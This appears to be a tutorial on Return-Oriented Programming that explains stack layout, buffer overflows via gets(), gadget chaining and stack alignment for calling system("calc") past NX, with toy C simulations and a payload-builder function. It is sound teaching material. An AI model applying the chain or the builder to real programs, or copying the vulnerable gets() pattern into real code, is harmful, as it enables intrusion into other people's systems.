Hacking with a Single Command: The Art of Return-Oriented Programming

Imagine a system being compromised by a single command.

You might look at it and say, “It’s just defining a numeric variable.” How can one line of code hack a system?

This is about Concealing Abstraction versus Fundamental Abstraction, and about how we can hack a system using only one command.

I am sure 98% of programmers will tell you, “This is a constant, and a constant cannot be changed.” This is a widespread, but incorrect, belief.

Today, we overturn that belief. We will change the “unchangeable” constant and break the rules of the language.

By executing a simple command, we can launch the Calculator. We take control of the processor’s execution flow and run instructions the programmer never wrote.

The Modern Challenge: NX Bit

Previously, things were simple. Inject Shellcode into memory, execute it, and the system is hacked.

But modern systems have changed the game. Running injected code from writable memory, such as the Stack or the Heap, is now almost impossible. This is thanks to technologies like the NX Bit, or “No-Execute”.

The rule is simple:

Memory that accepts writing prevents execution.
Memory that accepts execution prevents writing.

This law prevents us from injecting and running our own malicious code. So, how do we hack modern systems?

The “Ransom Note” Technique

In the world of crime, criminals hide their identity. One way is the “paper cutout” technique.

A criminal takes a newspaper and cuts out individual words. They assemble these words to form a threat letter. This avoids handwriting analysis and tracking.

They use something legal and natural—the newspaper—to create something malicious. This is the exact method hackers use in the ROP Chain technique.

ROP stands for Return-Oriented Programming. It relies on finding small fragments of existing code, called “Gadgets”. We chain these gadgets together to perform our attack.

But first, we must understand the memory structure.

Understanding Memory Layout

When you run a program, the system’s Loader takes the raw data from the hard disk (a PE file such as an .EXE on Windows, or an ELF file on Linux). It maps this data into memory, giving the program the illusion that it has the entire memory to itself. This is Virtual Memory, and it’s divided into several key sections.

graph TD
    subgraph Process Memory
        A["Text Section<br/>(RX - Executable)"]
        B["R-Data Section<br/>(R - Read-Only)"]
        C["Data Section<br/>(RW - Initialized)"]
        D["BSS Section<br/>(RW - Uninitialized)"]
        E["Heap<br/>(Grows Up)"]
        F["Shared Libraries<br/>(e.g., libc, kernel32.dll)"]
        G["Stack<br/>(Grows Down)"]
    end

    A --> B --> C --> D --> E --> F --> G

Text Section (.text): This is where the program’s actual code lives, turned into Machine Code. Its permissions are Read and Execute (RX). You cannot write to this area.
R-Data Section (.rodata): This holds Read-Only Data. Think const global variables and string literals like “Hello World”. You can only read from this section.
Data Section (.data): This stores initialized global variables, like int x = 10;.
BSS Section (.bss): This is for uninitialized global variables, like int x;. The system initializes them to zero.
Heap: This is the programmer’s playground for dynamic memory allocation using functions like malloc(). The Heap grows upwards toward higher memory addresses.
Shared Libraries: This is where libraries the program needs, like the C library (libc), are loaded. This area is critical for our Return-to-Libc attack.
Stack: This is where function information, local variables, and return addresses are stored. The Stack grows downwards toward lower memory addresses.

Where Does Everything Go?

Let’s look at a simple C code example to see this in action.

#include <stdio.h>
#include <stdlib.h>

// Global variables
int x; // Uninitialized -> Stored in BSS
int y = 20; // Initialized -> Stored in Data
const int z = 30; // Constant -> Stored in R-Data

int main(void) {
    // Local variable
    int c = 40; // Stored on the Stack

    // Dynamic allocation
    int *ptr = malloc(sizeof(int)); // 'ptr' is on the Stack, the allocated bytes (typically 4) are on the Heap
    if (ptr == NULL) {
        return 1; // Allocation failed
    }

    // String literal
    printf("Hello World"); // "Hello World" is stored in R-Data

    free(ptr); // Release the Heap allocation
    return 0;
}

Understanding this layout is not just theoretical. When you do reverse engineering, every piece matters.

The Stack: The Battlefield

The Stack is a temporary storage area that works on the LIFO principle: Last-In, First-Out.

[!TIP] Think of a stack of plates. The last plate you put on top is the first one you take off.

PUSH: Adds a value to the top of the Stack.
POP: Removes the top value from the Stack.

The Stack is crucial for understanding Buffer Overflows and executing ROP attacks. Always remember: Stack = plates.
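To make PUSH and POP concrete, here is a minimal sketch of a toy stack that grows downward, the way the x86 stack does. The names ToyStack, toy_init, toy_push and toy_pop are invented for this illustration and are not part of any real API; the 16-slot size is arbitrary.

```c
#include <stddef.h>
#include <stdint.h>

#define STACK_SLOTS 16  /* arbitrary size for the illustration */

/* Toy model of a downward-growing stack (hypothetical, not a real API). */
typedef struct {
    uint64_t slots[STACK_SLOTS];
    size_t sp; /* index of the current top; STACK_SLOTS means "empty" */
} ToyStack;

void toy_init(ToyStack *s) {
    s->sp = STACK_SLOTS;
}

/* PUSH: move the stack pointer down one slot, then store the value.
   Returns 0 on success, -1 if the stack is full. */
int toy_push(ToyStack *s, uint64_t value) {
    if (s->sp == 0) {
        return -1;
    }
    s->sp--;
    s->slots[s->sp] = value;
    return 0;
}

/* POP: read the value at the top, then move the stack pointer back up.
   Returns 0 on success, -1 if the stack is empty. */
int toy_pop(ToyStack *s, uint64_t *out) {
    if (s->sp == STACK_SLOTS) {
        return -1;
    }
    *out = s->slots[s->sp];
    s->sp++;
    return 0;
}
```

Push 1, 2, 3 and the pops come back as 3, 2, 1. Notice that the index sp shrinks on every push: that is the “grows down” behaviour in miniature.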

Registers: The Processor’s Workbench

Registers are tiny, super-fast storage units located inside the processor. If RAM is the refrigerator, registers are the cutting board where the processor does its work.

There are two main types:

General-Purpose Registers (GPRs): Like RAX, RBX, RCX. We can use them for general calculations and data storage.
Special-Purpose Registers: These have specific jobs.
- RIP (Instruction Pointer): The “processor’s finger.” It points to the address of the next instruction to execute. Controlling this means controlling the program’s flow.
- RSP (Stack Pointer): Always points to the top of the stack.
- RBP (Base Pointer): Points to the base of the current function’s stack frame.

[!NOTE] On 64-bit x86, register names start with R (e.g., RAX, RIP). On 32-bit x86, they start with E (e.g., EAX, EIP).

The Stack Frame: A Function’s Workspace

Every time a function is called, a workspace is reserved for it on the Stack. This is the Stack Frame.

It contains everything the function needs to operate and, crucially, to return safely.

graph TD
    direction BT
    subgraph Frame["Stack Frame (Grows Down)"]
        subgraph Higher Addresses
            A[Function Arguments]
            B[Return Address]
            C["Saved RBP (of previous frame)"]
        end
        subgraph Lower Addresses
            D[Local Variables]
        end
    end
    A --> B --> C --> D

The most important part for us is the Return Address. After a function finishes, the processor looks at this address to know where to go next.

If we can overwrite this address, we can control the RIP. We can tell the processor to jump anywhere we want.

Buffer Overflow: The Entry Point

The Stack grows downwards, toward lower addresses, but when we write data to a buffer (like an array), the data fills upwards, toward higher addresses.

This creates a vulnerability.

Imagine a local variable, a character array (buffer), that’s 8 bytes long. If we write more than 8 bytes into it, we overflow the buffer. The extra bytes overwrite whatever sits above it in the stack frame: other local variables, the saved RBP, and finally, if the input is long enough, the Return Address.

This is a Buffer Overflow. We exploit this overflow to seize control of the RIP.

#include <stdio.h>

void vulnerable_function() {
    char buffer[8]; // 8-byte buffer
    int secret = 42;
    printf("Enter your name: ");
    gets(buffer); // Unsafe: no bounds check, allows overflow (removed from the language in C11)
}

int main() {
    vulnerable_function();
    return 0;
}

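By providing more than 8 characters of input to gets(), we can overwrite whatever the compiler placed above the buffer: possibly the secret variable, then the saved RBP, and then the return address. The exact order and padding depend on the compiler and its options.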
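The overflow can be watched safely in a model. The sketch below assumes a simplified frame with no padding, no other locals and no stack canary: an 8-byte buffer, then the saved RBP, then the return address. ToyFrame and toy_unchecked_copy are hypothetical names made up for this example, and the copy is clamped to the model's size so the demo itself never writes out of bounds.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified frame layout. Real compilers may reorder
   locals, add padding, or insert a stack canary. */
typedef struct {
    char     buffer[8];      /* lowest address: the local array        */
    uint64_t saved_rbp;      /* next: the caller's saved base pointer  */
    uint64_t return_address; /* highest: where RET will jump           */
} ToyFrame;

/* Copies len bytes starting at the beginning of buffer without checking
   len against sizeof(buffer), which is the mistake gets() makes.
   The copy is clamped to the size of the model frame so that this
   demonstration stays inside memory it owns.
   Returns the number of bytes actually copied. */
size_t toy_unchecked_copy(ToyFrame *frame, const unsigned char *input, size_t len) {
    if (len > sizeof(ToyFrame)) {
        len = sizeof(ToyFrame);
    }
    memcpy(frame, input, len); /* the frame starts at buffer[0] */
    return len;
}
```

Feed it 8 bytes and return_address is untouched. Feed it 24 bytes and the last 8 land exactly on return_address, while the middle 8 replace saved_rbp.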

Return-Oriented Programming (ROP) in Action

We’ve overwritten the return address. Now what? We can’t just point it to our own shellcode on the Stack because of the NX Bit.

So, we point it to a Gadget.

A gadget is a small sequence of existing code, already in an executable section (like .text or a shared library), that ends with a RET instruction.

The RET instruction is our glue. It behaves like POP RIP: it pops the next value from the stack into the RIP register, effectively jumping to that address.

By carefully crafting a chain of gadget addresses on the stack, we can make the program do our bidding.

API vs. ABI: The Rules of Engagement

To call a function like system(), we can’t just jump to it. We have to follow the rules.

API (Application Programming Interface): The high-level contract. system("cmd"). Simple.
ABI (Application Binary Interface): The low-level contract. It defines how arguments are passed to functions.

For 64-bit systems:

Windows x64: The first argument goes into the RCX register.
Linux x64: The first argument goes into the RDI register.

So, to call system("cmd") on Windows, we need to get the address of the string “cmd” into RCX. How? With a gadget! We need to find a POP RCX; RET gadget.

The ROP Chain

Our attack plan is now clear:

Find a Buffer Overflow vulnerability to control the stack.
Find a POP RCX; RET gadget (for Windows).
Find the address of the system function.
Find the address of the string "cmd" (or "calc").
Construct the payload on the stack.

The payload will look like this:

Junk data to fill the buffer up to the return address.
Address of the POP RCX; RET gadget.
Address of the string "calc".
Address of the system function.

When the vulnerable function returns, it will POP the address of our first gadget into RIP. The processor jumps to POP RCX; RET. It pops the address of "calc" into RCX. Then it RETs again, popping the address of system into RIP. The processor jumps to system, which sees its argument ("calc") waiting in RCX and executes it.

Game over.
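The walk through the chain can be replayed in a toy interpreter. This is only a sketch: the addresses in the enum are invented placeholders, ToyCpu and toy_run_chain are hypothetical names, and reaching the fake system address merely records what RCX held instead of running anything.

```c
#include <stddef.h>
#include <stdint.h>

/* Made-up addresses, for illustration only. */
enum {
    ADDR_POP_RCX_RET = 0x1000,
    ADDR_SYSTEM      = 0x2000,
    ADDR_STR_CALC    = 0x3000
};

typedef struct {
    const uint64_t *stack; /* payload words, starting at the overwritten return address */
    size_t len;            /* number of words in the payload */
    size_t rsp;            /* index of the next word to pop  */
    uint64_t rip;
    uint64_t rcx;
    uint64_t system_arg;   /* RCX as seen on arrival at "system"; 0 if never reached */
} ToyCpu;

/* Pops one word from the model stack. Returns 1 on success, 0 if exhausted. */
static int toy_pop_word(ToyCpu *cpu, uint64_t *out) {
    if (cpu->rsp >= cpu->len) {
        return 0;
    }
    *out = cpu->stack[cpu->rsp++];
    return 1;
}

/* Replays the chain. Returns 1 if "system" is reached, 0 otherwise. */
int toy_run_chain(ToyCpu *cpu, const uint64_t *payload, size_t len) {
    cpu->stack = payload;
    cpu->len = len;
    cpu->rsp = 0;
    cpu->rcx = 0;
    cpu->system_arg = 0;

    /* The vulnerable function's own RET: pop the first word into RIP. */
    if (!toy_pop_word(cpu, &cpu->rip)) {
        return 0;
    }
    for (;;) {
        switch (cpu->rip) {
        case ADDR_POP_RCX_RET:
            if (!toy_pop_word(cpu, &cpu->rcx)) return 0; /* POP RCX */
            if (!toy_pop_word(cpu, &cpu->rip)) return 0; /* RET     */
            break;
        case ADDR_SYSTEM:
            cpu->system_arg = cpu->rcx; /* first argument, per the Windows x64 ABI */
            return 1;
        default:
            return 0; /* unknown address: a real process would most likely crash */
        }
    }
}
```

Run it on the three-word payload { ADDR_POP_RCX_RET, ADDR_STR_CALC, ADDR_SYSTEM } and system_arg ends up holding ADDR_STR_CALC. Drop the last word and the chain runs off the end of the stack before system is ever reached.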

Concealing Abstraction: Finding Hidden Gadgets

Where do we find these gadgets? Sometimes, they are hiding in plain sight.

Consider this line of code: int score = 50009;

To a programmer, it’s a number. To a reverse engineer, it’s bytes.

50009 in hexadecimal is 0xC359. Because x86 is Little Endian, the 4-byte int is stored least significant byte first: 59 C3 00 00.

0x59 is the machine code for POP RCX.
0xC3 is the machine code for RET.

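The programmer unintentionally created a perfect POP RCX; RET gadget. When the compiler embeds the value as an immediate operand of the instruction that initializes the variable (as it typically does for a local variable), the bytes 59 C3 end up inside executable memory. This is Concealing Abstraction.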

By jumping into the middle of the instruction that defines this variable, we can execute these bytes as code. This is called Misaligned Execution.
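The byte arithmetic is easy to check for yourself. The sketch below splits a 32-bit value into its little-endian bytes and tests whether the first two are 0x59 0xC3. The helper names le32_bytes and is_pop_rcx_ret are made up for this example; the shifts are used so the result does not depend on the machine you compile on.

```c
#include <stdint.h>

/* Writes the little-endian encoding of a 32-bit value into out[0..3].
   Shifting extracts the bytes explicitly, so the result is the same
   on any host. */
void le32_bytes(uint32_t value, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) {
        out[i] = (unsigned char)((value >> (8 * i)) & 0xFF);
    }
}

/* Returns 1 if the two bytes at p are 0x59 0xC3, the x86-64 encodings
   of POP RCX and RET, and 0 otherwise. */
int is_pop_rcx_ret(const unsigned char *p) {
    return p[0] == 0x59 && p[1] == 0xC3;
}
```

For 50009 the bytes come out as 59 C3 00 00 and the check succeeds. Change the number to 50010 and the first byte becomes 5A, so the gadget disappears.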

Deep Dive: Stack Alignment

There's a hidden trap in x64 exploitation: **Stack Alignment**. Some functions, especially those using SIMD instructions like `movaps`, require the stack pointer (`RSP`) to be 16-byte aligned (the address must end in `0`) at the moment the instruction runs. Compilers arrange this by assuming the function was entered through a `CALL`, which pushes an 8-byte return address. A ROP chain enters `system` through a `RET` instead, so `RSP` may be off by 8 from what the function expects, causing a crash.

The solution is simple: add an extra `RET` to the chain. The final chain becomes:

1. `POP RCX; RET` gadget
2. Argument (`"calc"` address)
3. **`RET` gadget (the alignment fix)**
4. `system` function address

The extra `RET` pops 8 bytes, re-aligning the stack before the final jump to `system`.
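The alignment fix is plain arithmetic. The sketch below assumes the usual x64 convention that RSP is a multiple of 16 right before a CALL, so a normally called function starts with RSP equal to 8 modulo 16. Both function names are hypothetical, and the sample address in the note after the code is made up.

```c
#include <stdint.h>

/* Convention assumed here: RSP is a multiple of 16 right before CALL,
   and CALL pushes 8 bytes, so a normally called function starts with
   RSP % 16 == 8. Returns 1 if rsp matches that expectation. */
int entry_rsp_looks_normal(uint64_t rsp) {
    return rsp % 16 == 8;
}

/* Each extra RET gadget occupies one 8-byte slot in the chain, so the
   target function is entered with RSP 8 bytes higher per extra RET. */
uint64_t entry_rsp_with_extra_rets(uint64_t entry_rsp, unsigned extra_rets) {
    return entry_rsp + 8ULL * extra_rets;
}
```

If the chain would enter system with RSP at 0x7ffc0000f0f0, the check fails. One extra RET moves it to 0x7ffc0000f0f8 and the check passes. A second extra RET would break it again, which is why exactly one is added.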

The Final Payload

This is what we send to the program:

Padding: A string of characters to overflow the buffer and reach the return address.
Gadget 1 Address: The address of POP RCX; RET.
Argument: The address of the string "calc".
Gadget 2 Address: The address of a simple RET for stack alignment.
Function Address: The address of the system function.
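Laid out as bytes, the payload is just padding followed by four 8-byte little-endian values. Here is a minimal sketch of a builder, where build_payload and put_le64 are hypothetical helpers and every address is a placeholder supplied by the caller. The padding length is also an input, because it depends on the real frame layout of the target.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stores a 64-bit value in little-endian byte order, as x86-64 expects.
   Returns the number of bytes written (always 8). */
static size_t put_le64(unsigned char *dst, uint64_t v) {
    for (int i = 0; i < 8; i++) {
        dst[i] = (unsigned char)((v >> (8 * i)) & 0xFF);
    }
    return 8;
}

/* Fills out with padding_len filler bytes followed by the four chain
   entries, in the order listed above. All addresses are placeholders.
   Returns the number of bytes written, or 0 if cap is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t padding_len,
                     uint64_t pop_rcx_ret, uint64_t calc_str,
                     uint64_t ret_gadget, uint64_t system_fn) {
    size_t need = padding_len + 4 * 8;
    if (need < padding_len || cap < need) { /* size overflow or buffer too small */
        return 0;
    }
    memset(out, 'A', padding_len);              /* Padding          */
    size_t off = padding_len;
    off += put_le64(out + off, pop_rcx_ret);    /* Gadget 1 Address */
    off += put_le64(out + off, calc_str);       /* Argument         */
    off += put_le64(out + off, ret_gadget);     /* Gadget 2 Address */
    off += put_le64(out + off, system_fn);      /* Function Address */
    return off;
}
```

With 16 bytes of padding the result is 48 bytes long: the filler, then each address with its least significant byte first.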

We press Enter. The Calculator launches.

We have successfully bypassed the NX protection using only code that was already inside the process. Your knowledge is your only true weapon. If you understand the physics of the processor, you become self-sufficient. You can see the gadgets hiding behind the abstraction.